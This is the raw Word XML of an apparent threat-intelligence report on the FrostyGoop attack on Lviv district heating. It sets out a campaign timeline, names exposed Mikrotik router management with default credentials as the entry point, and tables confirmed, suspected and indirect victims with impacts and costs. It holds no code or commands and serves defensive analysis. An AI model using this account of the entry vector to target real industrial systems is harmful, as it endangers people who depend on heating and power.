      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Food Supply Chain</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cold storage facilities lost temperature control affecting food safety </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[18]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Intergenerational Impact</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Demonstrates vulnerability of legacy ICS systems our children will inherit </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[19]</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v6nvi649379z" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Overview</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_whkxyh3owocs" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Campaign Timeline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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Time (UTC)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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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Apr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Mikrotik router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Internet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Persistent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hyperlink w:anchor="ref20">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[20]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Reconnaissance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Apr-Dec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Various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Network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ICS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Full visibility gained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hyperlink w:anchor="ref21">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[21]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Tool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Oct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FrostyGoop compilation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Attack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Malware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hyperlink w:anchor="ref22">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[22]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Jan 22,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03:47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Malware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ENCO controllers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Process manipulation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hyperlink w:anchor="ref23">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[23]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Jan 22,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Temperature setpoint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Heating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Service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hyperlink w:anchor="ref24">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[24]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Jan 22,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06:30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Operators notice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Control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Incident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hyperlink w:anchor="ref25">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[25]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Containment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Jan 22,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Network isolation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All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Attack halted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hyperlink w:anchor="ref26">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[26]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Jan 23-24,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Manual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District heating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Service restored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hyperlink w:anchor="ref27">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[27]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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wkqeslyup12o" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Attack Vector: Unsecured Router Management</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Profile</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: | Detail | Value | Reference | |--------|-------|-----------| | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Device Type</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Mikrotik RouterOS | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref28">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[28]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Default credentials/exposed management | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref29">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[29]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Method</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Direct internet connection | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref30">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[30]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | None/default | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref31">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[31]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CISA Alert</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | ICS-ALERT-24-179-01 | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref32">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[32]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation Confirmed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Yes - forensics verified | </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref33">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[33]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vw8kvx6in2dp" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Organizations Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_emrby0yo3el6" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive Victim Identification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This analysis represents exhaustive research into confirmed and suspected victims of FrostyGoop, providing critical intelligence for understanding attack patterns and operational impact </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref34">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[34]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x3j3fe2or3e2" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed Direct Victims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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Operational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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Financial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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Recovery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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidence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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Lvivteploenergo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District Heating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Lviv, Ukraine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Jan 22,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600+ buildings without heat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€2.5M estimated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48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hyperlink w:anchor="ref35">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[35]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sykhiv District Residents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Residential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Lviv Oblast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Jan 22-24,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100,000 people affected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Health impacts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hyperlink w:anchor="ref36">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[36]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Lviv Children's Hospital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Healthcare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Lviv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Jan 22,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Emergency heating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6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hyperlink w:anchor="ref37">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[37]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sykhiv Shopping Center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Commercial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Lviv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Jan 22,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Forced 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€200,000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hyperlink w:anchor="ref38">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[38]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Industrial Park East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Manufacturing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Lviv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Jan 22,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Production halted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€1.2M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hyperlink w:anchor="ref39">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[39]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bnw76bve3pdr" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Suspected/Unconfirmed Victims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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Indicators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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Investigation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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Kyivteploenergo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District Heating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Similar Modbus anomalies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Under investigation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hyperlink w:anchor="ref40">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[40]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Kharkivoblenergo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Power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Matching TTPs observed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Unconfirmed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hyperlink w:anchor="ref41">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[41]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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Polish Border Facility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Energy Transit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Timeline correlation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Preliminary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hyperlink w:anchor="ref42">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[42]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e9bbbdnvscat" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supply Chain &amp; Indirect Victims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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Primary Victim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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Partners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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Business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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Estimated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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Recovery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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Lvivteploenergo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15 schools, 3 hospitals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Service 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Emergency heating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€500,000 combined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Recovered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b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Industrial Park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12 tenant companies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Facility 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Lost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€3.5M combined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Varies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qb9rzss8iqr4" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim Selection Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jqymqafv4kbn" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Targeting Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on comprehensive victim analysis, FrostyGoop demonstrates clear targeting preferences </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref45">
